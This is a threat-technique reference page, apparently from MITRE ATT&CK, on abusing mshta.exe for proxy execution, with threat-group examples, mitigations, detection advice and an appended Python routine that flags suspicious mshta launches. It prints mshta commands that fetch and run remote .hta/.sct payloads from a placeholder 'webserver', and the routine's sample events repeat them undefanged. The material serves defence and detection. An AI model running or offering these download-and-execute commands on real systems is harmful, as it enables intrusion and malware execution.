Signed Binary Proxy Execution: Mshta
Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code. [1] [2] [3] [4] [5]
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. [6] HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. [7]
Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of Internet Explorer's security context, it also bypasses browser security settings. [8]
Procedure Examples
Name | Description |
---|---|
APT32 | |
FIN7 | FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems.[5] |
Inception | Inception has used malicious HTA files to drop and execute malware.[11] |
Kimsuky | Kimsuky has used mshta to run malicious scripts on the system.[12] |
Koadic | |
Lazarus Group | Lazarus Group has used mshta.exe to run malicious scripts and download programs.[14] |
Metamorfo | |
MuddyWater | MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.[16][17] |
NanHaiShu | |
POWERSTATS | POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts.[16] |
Revenge RAT | Revenge RAT uses mshta.exe to run malicious scripts on the system.[19] |
Xbash | |
Mitigations
Mitigation | Description |
---|---|
Disable or Remove Feature or Program | Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life. |
Execution Prevention | Use application control configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries. |
Detection
Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.
Monitor use of HTA files. If they are not typically used within an environment, then execution of them may be suspicious.
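The detection guidance above, turned into a small triage routine as an added example (not part of the ATT&CK page): it takes process-creation events, keeps only mshta.exe launches, flags inline vbscript:/javascript: arguments and remote URLs, and compares any local .hta path against an assumed baseline of known-good files. The event records and the baseline are constructed for the example.

```python
import re

# Constructed sample process-creation events (image path + command line); not from the page.
EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\Tools\dashboard.hta"'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'mshta vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://webserver/payload.hta"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta \"javascript:unescape('%3Cplaceholder%3E')\""},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta C:\Users\Public\update.hta"},
    {"image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

# Assumed baseline of .hta files seen in prior known-good history for this environment.
KNOWN_GOOD_HTA = {r"c:\program files\vendor\tools\dashboard.hta"}

INLINE_SCRIPT = re.compile(r"\b(vbscript|javascript):", re.IGNORECASE)
REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)
HTA_PATH = re.compile(r'"([^"]+\.hta)"|(\S+\.hta)\b', re.IGNORECASE)

def classify(event):
    """Return a reason string if the event is an anomalous mshta.exe launch, else None."""
    if not event["image"].lower().endswith(r"\mshta.exe"):
        return None                       # only mshta.exe launches are in scope
    cmd = event["cmdline"]
    if INLINE_SCRIPT.search(cmd):
        return "inline-script"            # raw VBScript/JScript passed on the command line
    if REMOTE_URL.search(cmd):
        return "remote-url"               # .hta or script fetched from a web server
    m = HTA_PATH.search(cmd)
    if m:
        path = (m.group(1) or m.group(2)).lower()
        return None if path in KNOWN_GOOD_HTA else "unknown-hta"
    return "no-hta-argument"              # mshta.exe launched without a file or script argument

def find_suspicious(events):
    """Return (command line, reason) pairs for every anomalous mshta.exe event."""
    hits = []
    for event in events:
        reason = classify(event)
        if reason:
            hits.append((event["cmdline"], reason))
    return hits
```

Feeding real Sysmon Event ID 1 or Windows 4688 records into `classify` only requires mapping their image and command-line fields onto the two keys used here.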
References
- Gross, J. (2016, February 23). Operation Dust Storm. Retrieved September 19, 2017.
- McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.
- Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.
- Dove, A. (2016, March 23). Fileless Malware – A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.
- Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.
- Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.
- Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.
- LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
- Dahan, A. (2017, May 24). Operation Cobalt Kitty: A Large-Scale APT in Asia Carried Out by the OceanLotus Group. Retrieved November 5, 2018.
- Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
- GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.
- Alyac. (2019, April 3). Kimsuky Organization Steals Operation Stealth Power. Retrieved August 13, 2019.
- Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.
- F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020.
- Sierra, E., Iglesias, G. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020.
- Singh, S. et al. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.
- Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.
- F-Secure Labs. (2016, July). NANHAISHU RATing the South China Sea. Retrieved July 6, 2018.
- Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved May 1, 2019.
- Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.